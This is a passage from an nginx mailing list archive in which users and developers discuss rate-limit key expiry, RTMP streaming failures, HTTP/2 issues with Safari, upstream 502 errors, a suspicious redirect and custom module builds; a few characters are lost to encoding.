bytes on 32-bit platforms and 128 bytes on 64-bit platforms. One megabyte zone can keep about 16 thousand 64-byte states or about 8 thousand 128-byte states. If the zone storage is exhausted, the server will return the 503 (Service Temporarily Unavailable) error to all further requests.* But there's no explanation for how the key cache eventually clears itself. Is any available? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Jul 14 20:26:26 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 14 Jul 2016 23:26:26 +0300 Subject: limit_req_zone key cache lifetime In-Reply-To: References: Message-ID: <20160714202626.GV57459@mdounin.ru> Hello! On Thu, Jul 14, 2016 at 07:22:06PM +0000, Chad Hansen wrote: > I'm looking for documentation or explanation for how keys expire in the > limit_req_zone. I have the basic documenations here: > > *A client IP address serves as a key. Note that instead of $remote_addr, > the $binary_remote_addr variable is used here. > The $binary_remote_addr variable?s size is always 4 bytes for > IPv4 addresses or 16 bytes for IPv6 addresses. The stored state always > occupies 64 bytes on 32-bit platforms and 128 bytes on 64-bit platforms. > One megabyte zone can keep about 16 thousand 64-byte states or about 8 > thousand 128-byte states. If the zone storage is exhausted, the server will > return the 503 (Service Temporarily Unavailable) error to all further > requests.* > > But there's no explanation for how the key cache eventually clears itself. > Is any available? The same page also specifies the algorithm used, http://nginx.org/en/docs/http/ngx_http_limit_req_module.html: : The limitation is done using the ?leaky bucket? method. See https://en.wikipedia.org/wiki/Leaky_bucket for further details about the algorithm itself. The algorithm implies that there is no need to store anything for keys where there are no excessive requests. Such zero states are automatically removed by the code when nginx is about to allocate a new state. -- Maxim Dounin http://nginx.org/ From chadhansen at google.com Thu Jul 14 20:30:11 2016 From: chadhansen at google.com (Chad Hansen) Date: Thu, 14 Jul 2016 20:30:11 +0000 Subject: limit_req_zone key cache lifetime In-Reply-To: <20160714202626.GV57459@mdounin.ru> References: <20160714202626.GV57459@mdounin.ru> Message-ID: Great, thank you! On Thu, Jul 14, 2016 at 4:26 PM Maxim Dounin wrote: > Hello! > > On Thu, Jul 14, 2016 at 07:22:06PM +0000, Chad Hansen wrote: > > > I'm looking for documentation or explanation for how keys expire in the > > limit_req_zone. I have the basic documenations here: > > > > *A client IP address serves as a key. Note that instead of $remote_addr, > > the $binary_remote_addr variable is used here. > > The $binary_remote_addr variable?s size is always 4 bytes for > > IPv4 addresses or 16 bytes for IPv6 addresses. The stored state always > > occupies 64 bytes on 32-bit platforms and 128 bytes on 64-bit platforms. > > One megabyte zone can keep about 16 thousand 64-byte states or about 8 > > thousand 128-byte states. If the zone storage is exhausted, the server > will > > return the 503 (Service Temporarily Unavailable) error to all further > > requests.* > > > > But there's no explanation for how the key cache eventually clears > itself. > > Is any available? > > The same page also specifies the algorithm used, > http://nginx.org/en/docs/http/ngx_http_limit_req_module.html: > > : The limitation is done using the ?leaky bucket? method. > > See https://en.wikipedia.org/wiki/Leaky_bucket for further > details about the algorithm itself. > > The algorithm implies that there is no need to store anything for > keys where there are no excessive requests. Such zero states are > automatically removed by the code when nginx is about to allocate > a new state. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From cgupta at adobe.com Fri Jul 15 05:04:49 2016 From: cgupta at adobe.com (Chinoy Gupta) Date: Fri, 15 Jul 2016 05:04:49 +0000 Subject: Getting realpath for a request Message-ID: Hi, I am creating a nginx proxy handler to talk to a backend server. In that handler, I would like to get the physical path of the file to be served by a request. The file can be present in the docroot of nginx or any alias. How can I get this information? Regards, Chinoy -------------- next part -------------- An HTML attachment was scrubbed... URL: From taha.ansari at matechco.com Fri Jul 15 09:59:11 2016 From: taha.ansari at matechco.com (Taha Ansari) Date: Fri, 15 Jul 2016 14:59:11 +0500 Subject: Issue playing back multiple RTMP live streams Message-ID: <005a01d1de7f$8c254280$a46fc780$@matechco.com> Server: Linux CentOS 6.(x) NGINX with RTMP module enabled (compiled myself using an online tutorial) I use FFmpeg to stream to this server, and one stream works perfectly. Example of perfectly working stream from IP camera: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test1 and to pull the stream, I use VLC/FFplay, and rtmp url is like so: ffplay rtmp://[nginx server]:1935/live/test1 Problem comes when I try to stream two streams simultaneously, like so: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test1 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test2 in this case, both streams is mostly choppy, and sometimes one stream fails to load at all. If I extend this to 10 inputs like so: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test1 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test2 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test3 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test4 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test5 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test6 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test7 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test8 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test9 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test10 Then although I can see all console are streaming perfectly fine, like so: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test10 ffmpeg version N-80801-gc0cb53c Copyright (c) 2000-2016 the FFmpeg developers built with gcc 4.4.7 (GCC) 20120313 (Red Hat 4.4.7-17) configuration: --extra-cflags=-I/root/ffmpeg_build/include --extra-ldflags=-L/root/ffmpeg_build/lib --pkg-config-flags=--static --enable-gpl --enable-nonfree --enable-libfdk-aac --enable-libfreetype --enable-libmp3lame --enable-libopus --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libx265 libavutil 55. 27.100 / 55. 27.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 40.101 / 57. 40.101 libavdevice 57. 0.102 / 57. 0.102 libavfilter 6. 46.102 / 6. 46.102 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 [rtsp @ 0x46594e0] SDP: v=0 o=- 45356132 1 IN IP4 192.168.5.100 s=Session streamed by stream i=1 t=0 0 a=tool:LIVE555 Streaming Media v2009.01.26 a=type:broadcast a=control:* a=range:npt=0- a=x-qt-text-nam:Session streamed by stream a=x-qt-text-inf:1 m=video 0 RTP/AVP 96 c=IN IP4 0.0.0.0 b=AS:506 a=framerate:30.00 a=rtpmap:96 H264/90000 a=fmtp:96 packetization-mode=1;profile-level-id=640028;sprop-parameter-sets=Z2QAKKzoB4 AiflQ=,aO48MA== a=control:track1 m=audio 0 RTP/AVP 0 c=IN IP4 0.0.0.0 b=AS:64 a=control:track2 [rtsp @ 0x46594e0] setting jitter buffer size to 0 Last message repeated 1 times Guessed Channel Layout for Input Stream #0.1 : mono Input #0, rtsp, from 'rtsp://admin:admin@[ip cam address]:554/channel1': Metadata: title : Session streamed by stream comment : 1 Duration: N/A, start: 0.000000, bitrate: N/A Stream #0:0: Video: h264 (High), 1 reference frame, yuv420p, 1920x1080 (1920x1088), 30 tbr, 90k tbn, 180k tbc Stream #0:1: Audio: pcm_mulaw, 8000 Hz, 1 channels, s16, 64 kb/s [flv @ 0x4696240] Using AVStream.codec to pass codec parameters to muxers is deprecated, use AVStream.codecpar instead. Last message repeated 1 times Output #0, flv, to 'rtmp://[nginx server]:1935/live/test10': Metadata: title : Session streamed by stream comment : 1 encoder : Lavf57.40.101 Stream #0:0: Video: h264, 1 reference frame ([7][0][0][0] / 0x0007), yuv420p, 1920x1080 (0x0), q=2-31, 30 tbr, 1k tbn, 90k tbc Stream #0:1: Audio: pcm_mulaw ([8][0][0][0] / 0x0008), 8000 Hz, mono, 64 kb/s Stream mapping: Stream #0:0 -> #0:0 (copy) Stream #0:1 -> #0:1 (copy) Press [q] to stop, [?] for help [flv @ 0x4696240] Timestamps are unset in a packet for stream 0. This is deprecated and will stop working in the future. Fix your code to set the timestamps properly frame= 42 fps=0.0 q=-1.0 size= 56kB time=00:00:02.83 bitrate= 163.1kbits frame= 54 fps= 46 q=-1.0 size= 62kB time=00:00:03.43 bitrate= 147.6kbits frame= 66 fps= 39 q=-1.0 size= 77kB time=00:00:04.03 bitrate= 157.1kbits frame= 76 fps= 34 q=-1.0 size= 83kB time=00:00:04.53 bitrate= 149.9kbits .. But when I try to pull it using FFplay, I always get this error (Invalid data found when processing input): >ffplay rtmp://[nginx server]:1935/live/test10 ffplay version N-80386-g5f5a97d Copyright (c) 2003-2016 the FFmpeg developers built with gcc 5.4.0 (GCC) configuration: --enable-gpl --enable-version3 --disable-w32threads --enable-nv enc --enable-avisynth --enable-bzlib --enable-fontconfig --enable-frei0r --enabl e-gnutls --enable-iconv --enable-libass --enable-libbluray --enable-libbs2b --en able-libcaca --enable-libfreetype --enable-libgme --enable-libgsm --enable-libil bc --enable-libmodplug --enable-libmfx --enable-libmp3lame --enable-libopencore- amrnb --enable-libopencore-amrwb --enable-libopenjpeg --enable-libopus --enable- librtmp --enable-libschroedinger --enable-libsnappy --enable-libsoxr --enable-li bspeex --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvo -amrwbenc --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libweb p --enable-libx264 --enable-libx265 --enable-libxavs --enable-libxvid --enable-l ibzimg --enable-lzma --enable-decklink --enable-zlib libavutil 55. 24.100 / 55. 24.100 libavcodec 57. 46.100 / 57. 46.100 libavformat 57. 38.100 / 57. 38.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 46.101 / 6. 46.101 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 RTMP_ReadPacket, failed to read RTMP packet headersq= 0B f=0/0 rtmp://64.49.234.250:1935/live/test10: Invalid data found when processing input nan : 0.000 fd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 If I enabled verbose log, then this is generated at FFplay: ffplay -loglevel verbose rtmp://[nginx server]:1935/live/test10 ffplay version N-80386-g5f5a97d Copyright (c) 2003-2016 the FFmpeg developers built with gcc 5.4.0 (GCC) configuration: --enable-gpl --enable-version3 --disable-w32threads --enable-nv enc --enable-avisynth --enable-bzlib --enable-fontconfig --enable-frei0r --enabl e-gnutls --enable-iconv --enable-libass --enable-libbluray --enable-libbs2b --en able-libcaca --enable-libfreetype --enable-libgme --enable-libgsm --enable-libil bc --enable-libmodplug --enable-libmfx --enable-libmp3lame --enable-libopencore- amrnb --enable-libopencore-amrwb --enable-libopenjpeg --enable-libopus --enable- librtmp --enable-libschroedinger --enable-libsnappy --enable-libsoxr --enable-li bspeex --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvo -amrwbenc --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libweb p --enable-libx264 --enable-libx265 --enable-libxavs --enable-libxvid --enable-l ibzimg --enable-lzma --enable-decklink --enable-zlib libavutil 55. 24.100 / 55. 24.100 libavcodec 57. 46.100 / 57. 46.100 libavformat 57. 38.100 / 57. 38.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 46.101 / 6. 46.101 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 Parsing... : 0.000 fd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 Parsed protocol: 0 Parsed host : 64.49.234.250 Parsed app : live RTMP_Connect1, ... connected, handshaking= 0KB sq= 0B f=0/0 HandShake: Type Answer : 03q= 0KB vq= 0KB sq= 0B f=0/0 HandShake: Server Uptime : 353698523 HandShake: FMS Version : 0.0.0.0 HandShake: Handshaking finished....0KB vq= 0KB sq= 0B f=0/0 RTMP_Connect1, handshaked Invoking connect HandleServerBW: server BW = 50000000KB vq= 0KB sq= 0B f=0/0 HandleClientBW: client BW = 5000000 2B vq= 0KB sq= 0B f=0/0 HandleChangeChunkSize, received: chunk size change to 4096 RTMP_ClientPacket, received: invoke 190 bytes (object begin) Property: Property: Property: (object begin) Property: Property: (object end) 0.000 fd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 Property: (object begin) Property: Property: Property: Property: (object end) (object end) HandleInvoke, server invoking <_result> HandleInvoke, received result for method call sending ctrl. type: 0x0003 Invoking createStream RTMP_ClientPacket, received: invoke 29 bytes 0KB sq= 0B f=0/0 (object begin) Property: Property: Property: NULL Property: (object end) HandleInvoke, server invoking <_result> HandleInvoke, received result for method call SendPlay, seekTime=0, stopTime=0, sending play: test10 Invoking play sending ctrl. type: 0x0003 RTMP_ClientPacket, received: invoke 96 bytes 0KB sq= 0B f=0/0 (object begin) Property: Property: Property: NULL Property: (object begin) Property: Property: Property: (object end) (object end) HandleInvoke, server invoking HandleInvoke, onStatus: NetStream.Play.Start RTMP_ClientPacket, received: notify 24 bytes 0KB sq= 0B f=0/0 (object begin) Property: Property: Property: (object end) RTMPSockBuf_Fill, recv returned -1. GetSockError(): 10060 (Unknown error) RTMP_ReadPacket, failed to read RTMP packet header Invoking deleteStreamd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 rtmp://[nginx server]:1935/live/test10: Invalid data found when processing input This is my nginx.conf: #user nobody; worker_processes 4; #error_log logs/error.log; #error_log logs/error.log notice; error_log logs/error.log info; #error_log logs/error.log debug; #pid logs/nginx.pid; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; #log_format main '$remote_addr - $remote_user [$time_local] "$request" ' # '$status $body_bytes_sent "$http_referer" ' # '"$http_user_agent" "$http_x_forwarded_for"'; #access_log logs/access.log main; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; #gzip on; server { listen 80; server_name localhost; #charset koi8-r; #access_log logs/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } location ~ \.php$ { fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; # location = /50x.html { # root html; # } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # #location ~ \.php$ { # proxy_pass http://127.0.0.1; #} # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } # another virtual host using mix of IP-, name-, and port-based configuration # #server { # listen 8000; # listen somename:8080; # server_name somename alias another.alias; # location / { # root html; # index index.html index.htm; # } #} # HTTPS server # #server { # listen 443 ssl; # server_name localhost; # ssl_certificate cert.pem; # ssl_certificate_key cert.key; # ssl_session_cache shared:SSL:1m; # ssl_session_timeout 5m; # ssl_ciphers HIGH:!aNULL:!MD5; # ssl_prefer_server_ciphers on; # location / { # root html; # index index.html index.htm; # } #} } rtmp { server { listen 1935; chunk_size 4096; application live { live on; record off; } application vod { play /var/flvs; } } } Can anyone tell why multiple RTMP streams are not being entertained? Is there any streaming restriction on nginx I am unaware of? -------------- next part -------------- An HTML attachment was scrubbed... URL: From devel at jasonwoods.me.uk Fri Jul 15 12:08:16 2016 From: devel at jasonwoods.me.uk (Jason Woods) Date: Fri, 15 Jul 2016 13:08:16 +0100 Subject: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: > On 11 Jul 2016, at 09:25, ZaneCEO wrote: > > @itpp2012 : building from source is a no-go for me due to future upgrade > concerns > > @Lukas : will follow your suggestion and try the ngingx-provided bins, > thanks! I?m beginning to hear many reports now of Safari and iOS users hitting connection issues on several websites, not just around upload but any arbitrary POST it seems. Building from source is a no go too, and we?ve always stayed on the feature stable branch as it?s easier to maintain since we don?t need to worry about additional features causing issues. I was anticipating such a compatibility problem to be fixed in feature stable but so far it?s looking like we will have to bite the bullet and move to mainline. Would I be correct here? It seems for our case at least, feature stable HTTP2 is not stable for production use at this time. Jason -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 455 bytes Desc: Message signed with OpenPGP using GPGMail URL: From luky-37 at hotmail.com Fri Jul 15 12:25:48 2016 From: luky-37 at hotmail.com (Lukas Tribus) Date: Fri, 15 Jul 2016 12:25:48 +0000 Subject: AW: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: , Message-ID: > I was anticipating such a compatibility problem to be fixed in feature stable but so far it?s looking like we will have to bite the bullet and move to mainline. > Would I be correct here? It seems for our case at least, feature stable HTTP2 is not stable for production use at this time. Correct. It has been stated multiple times that mainline is the suggested branch for HTTP2 use and that statement is still true. So yes, do not use the stable branch if using HTTP2. Lukas From nginx-forum at forum.nginx.org Fri Jul 15 17:22:16 2016 From: nginx-forum at forum.nginx.org (maltris) Date: Fri, 15 Jul 2016 13:22:16 -0400 Subject: "502 Bad Gateway" on first request in a setup with Apache 2.4-servers as upstreams Message-ID: The error I am getting in the logs: "upstream prematurely closed connection while reading response header from upstream" After the first request it works for 10-15 seconds without any problem. According to tcpdump in the first request (the failing one) the upstream is receiving one GET and nothing more. I found one workaround (https://hashnode.com/post/how-to-configure-nginx-to-hold-the-connections-and-retry-if-the-proxied-server-returns-502-cilngkof700iteq53ratetsry) which is adding the same upstream twice and adding the "backup"-option. The first request then fails but the second in all of my cases succeeds (checked via logs and tcpdump). Any ideas (also some comments that could lead me to the solution would be helpful)? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268306,268306#msg-268306 From h.aboulfeth at genious.Net Fri Jul 15 21:58:07 2016 From: h.aboulfeth at genious.Net (Hamza Aboulfeth) Date: Fri, 15 Jul 2016 22:58:07 +0100 Subject: Weird problem with redirects Message-ID: <57895C6F.6080707@genious.Net> Hello, I have a weird problem that suddenly appeared on a client's website yesterday. We have a redirection from non www to www and sometimes the redirection sends somewhere else: [root at genious33 nginx-1.11.2]# curl -IL -H "host: hespress.com" x.x.x.x HTTP/1.1 301 Moved Permanently Server: nginx/1.11.2 Date: Fri, 15 Jul 2016 21:54:06 GMT Content-Type: text/html Content-Length: 185 Connection: keep-alive Location: http://1755118213 .com/ dbg-redirect: nginx HTTP/1.1 302 Found Server: nginx/1.2.1 Date: Fri, 15 Jul 2016 21:52:37 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Set-Cookie: orgje=JbgbADQAAgABACVbiVf__yVbiVdAAAEAAAAlW4lXAA--; expires=Sat, 15-Jul-2017 21:52:37 GMT; path=/; domain=traffsell.com Location: http://m.xxx.com/ HTTP/1.1 200 OK Date: Fri, 15 Jul 2016 21:52:37 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: __cfduid=d5624eb7a789e21f082873681ec36a41b1468619557; expires=Sat, 15-Jul-17 21:52:37 GMT; path=/; domain=.hibapress.com; HttpOnly X-Powered-By: PHP/5.3.27 X-LiteSpeed-Cache: hit Vary: Accept-Encoding X-Turbo-Charged-By: LiteSpeed Server: cloudflare-nginx CF-RAY: 2c307148667c3f77-YUL Sometimes it acts as it should sometimes it redirect somewhere else If you have any clue about what's happening, do help me :) Thank you, Hamza From francis at daoine.org Sat Jul 16 07:47:19 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 16 Jul 2016 08:47:19 +0100 Subject: Weird problem with redirects In-Reply-To: <57895C6F.6080707@genious.Net> References: <57895C6F.6080707@genious.Net> Message-ID: <20160716074719.GR12280@daoine.org> On Fri, Jul 15, 2016 at 10:58:07PM +0100, Hamza Aboulfeth wrote: Hi there, > I have a weird problem that suddenly appeared on a client's website > yesterday. We have a redirection from non www to www and sometimes > the redirection sends somewhere else: > > [root at genious33 nginx-1.11.2]# curl -IL -H "host: hespress.com" x.x.x.x If that x.x.x.x is enough to make sure that this request gets to your nginx, then your nginx config is probably involved. If this only started yesterday, then changes since yesterday (or since your nginx was last restarted before yesterday) are probably most interesting. And as a very long shot: if you can "tcpdump" to see that nginx is sending one thing, but the client is receiving something else, then you'll want to look outside nginx at something else interfering with the traffic. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Sat Jul 16 08:31:18 2016 From: nginx-forum at forum.nginx.org (skorpinok) Date: Sat, 16 Jul 2016 04:31:18 -0400 Subject: Images loaded but not displaying Message-ID: <57b40e55436b16b14e2832f89b12b86c.NginxMailingListEnglish@forum.nginx.org> Hi, i have installed nginx/1.2.1 on a debian 7 server, the image seems to have been loaded but shows broken & are not displayed on my index.html page here is what did, html> Welcome to nginx!

Welcome to nginx!

infographic please suggest me how to fix this ? Regards skorpinok Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268312,268312#msg-268312 From hobson42 at gmail.com Sat Jul 16 09:39:28 2016 From: hobson42 at gmail.com (Ian Hobson) Date: Sat, 16 Jul 2016 10:39:28 +0100 Subject: Images loaded but not displaying In-Reply-To: <57b40e55436b16b14e2832f89b12b86c.NginxMailingListEnglish@forum.nginx.org> References: <57b40e55436b16b14e2832f89b12b86c.NginxMailingListEnglish@forum.nginx.org> Message-ID: <93d234ce-1035-d431-0f6d-f789347a28ec@gmail.com> Hi skorpinok Two points: 1) Use correct HTML, or you can only blame yourself if different browsers mangle it each in their own way. The structure is Html 5 only. </head> <body> page content properly nested. </body> </html> (eof) 2) The src url takes its root as the location of the current page (unless overridden with a base tag in the head area). My guess is you need <img src="/images/infographic.jpg" .... Regards Ian On 16/07/2016 09:31, skorpinok wrote: > Hi, i have installed nginx/1.2.1 on a debian 7 server, the image seems to > have been loaded but shows broken & are not displayed on my index.html > page > > here is what did, > > html> > <head> > <title>Welcome to nginx! > > >

Welcome to nginx!

> > > > > > > infographic width="800" height="800"> > > > > > > > please suggest me how to fix this ? > > Regards > skorpinok > From nginx-forum at forum.nginx.org Sat Jul 16 09:56:42 2016 From: nginx-forum at forum.nginx.org (skorpinok) Date: Sat, 16 Jul 2016 05:56:42 -0400 Subject: Images loaded but not displaying In-Reply-To: <93d234ce-1035-d431-0f6d-f789347a28ec@gmail.com> References: <93d234ce-1035-d431-0f6d-f789347a28ec@gmail.com> Message-ID: <8086be95cd4b76a52d78d37d8aaa2d0a.NginxMailingListEnglish@forum.nginx.org> Hi, Ian Hobson, thanks its fixed, Message-ID: <00552183-15eb-4183-806e-f834d6051eaa@email.android.com> An HTML attachment was scrubbed... URL: From lists at ruby-forum.com Sun Jul 17 09:19:10 2016 From: lists at ruby-forum.com (Andrii Balytskyi) Date: Sun, 17 Jul 2016 11:19:10 +0200 Subject: CentOS 5 - NGiNX - AIO In-Reply-To: <4AFAA4EB.7060903@internetx.de> References: <4AFAA4EB.7060903@internetx.de> Message-ID: <361b6a9795cdac80df711317fa275fea@ruby-forum.com> ?? ????? ???? ???????? ? AIO ??????????????? ? ???????, ?? ?????? ??? ????????????? ????????? ???????. ? ???????? ????????? ??? ????????????? ?????? Uppod. -- Posted via http://www.ruby-forum.com/. From nginx-forum at forum.nginx.org Sun Jul 17 14:18:58 2016 From: nginx-forum at forum.nginx.org (pcd) Date: Sun, 17 Jul 2016 10:18:58 -0400 Subject: Slow performance when sending a large file upload request via proxy_pass Message-ID: <0eb425c4e764553662e0da37880fa56f.NginxMailingListEnglish@forum.nginx.org> I'm trying to diagnose some strange behavior in my web app, and at the moment it seems like nginx may be at fault, though I'd be happy to learn otherwise. On the client side, I'm using flow.js (https://github.com/flowjs/flow.js) to upload a file to the server. This library should allow me to upload very large files by splitting them up into (by default) 1MB chunks, and sending each chunk as a standard file form upload request. On the server, I am connecting to a Python WSGI server (gunicorn) via try_files / proxy_pass. The configuration is very standard: location / { root /var/www; index index.html index.htm; try_files $uri $uri/ @proxy_to_app; } location @proxy_to_app { proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host $http_host; proxy_redirect off; proxy_pass http://app_server; } The Python code is pretty simple, mainly just opening the file and writing the data. According to the gunicorn access log, each request takes around 135ms: 127.0.0.1 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.0" 200 - ... 0.135206 127.0.0.1 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.0" 200 - ... 0.136749 127.0.0.1 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.0" 200 - ... 0.137314 But in the nginx access log, the $request_time varies wildly and is usually very large: 10.0.0.0 - - [17/Jul/2016:05:07:06 +0000] "POST /files HTTP/1.1" 200 ... 0.956 10.0.0.0 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.1" 200 ... 0.553 10.0.0.0 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.1" 200 ? 0.888 At first I thought it might be the network itself taking a long time to send the data, but looking at the network logs in the browser doesn?t seem to bear this out. Once the socket connection is established, Chrome says that the request time is often as low as 8ms, with the extra ~.5s-1s spent waiting for a response. So the question is, what is nginx doing during all that extra time? On normal (small) requests, the times in the two logs are identical, but even dialing down the chunk size to flow.js to 128kb or 64kb results in a delay in nginx, and it's making it take way too long to upload these files (I can't just set the chunk size to something super small like 4kb, because the overhead of making so many requests makes the uploads slower). I've tried messing with various configuration options including proxy_buffer_size and proxy_request_buffering, to no effect. Any ideas on next steps for how I could begin to diagnose this? Extra info: CentOS 7, running on AWS nginx version: nginx/1.10.1 built by gcc 4.8.5 20150623 (Red Hat 4.8.5-4) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib64/nginx/modules --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-http_xslt_module=dynamic --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-http_perl_module=dynamic --add-dynamic-module=njs-1c50334fbea6/nginx --with-threads --with-stream --with-stream_ssl_module --with-http_slice_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_v2_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -m64 -mtune=generic' Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268317,268317#msg-268317 From pankajitbhu at gmail.com Mon Jul 18 06:58:34 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Mon, 18 Jul 2016 12:28:34 +0530 Subject: while building own nginx module error to find user defined header file Message-ID: Hi All, I have written my own nginx module and i have my user defined header files but while building i am getting error header file not found. my module will act as a filter. Please help me. Regards, Pankaj -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 18 13:09:29 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 18 Jul 2016 16:09:29 +0300 Subject: while building own nginx module error to find user defined header file In-Reply-To: References: Message-ID: <20160718130929.GA57459@mdounin.ru> Hello! On Mon, Jul 18, 2016 at 12:28:34PM +0530, Pankaj Chaudhary wrote: > I have written my own nginx module and i have my user defined header files > but while building i am getting error header file not found. If you are using header files in your module, you have to add your module directory to the list of include paths. Assuming you are using auto/module script to configure your module, you should do something like this in your module ./config script: ngx_module_type=HTTP_AUX_FILTER ngx_module_name=ngx_http_example_filter_module ngx_module_incs=$ngx_addon_dir ngx_module_deps= ngx_module_srcs=$ngx_addon_dir/ngx_http_example_filter_module.c ngx_module_libs= . auto/module -- Maxim Dounin http://nginx.org/ From liangsijian at foxmail.com Mon Jul 18 16:38:58 2016 From: liangsijian at foxmail.com (=?gb18030?B?wbrLvL2h?=) Date: Tue, 19 Jul 2016 00:38:58 +0800 Subject: fix ngx_reset_pool Message-ID: # HG changeset patch # User Liang Sijian # Date 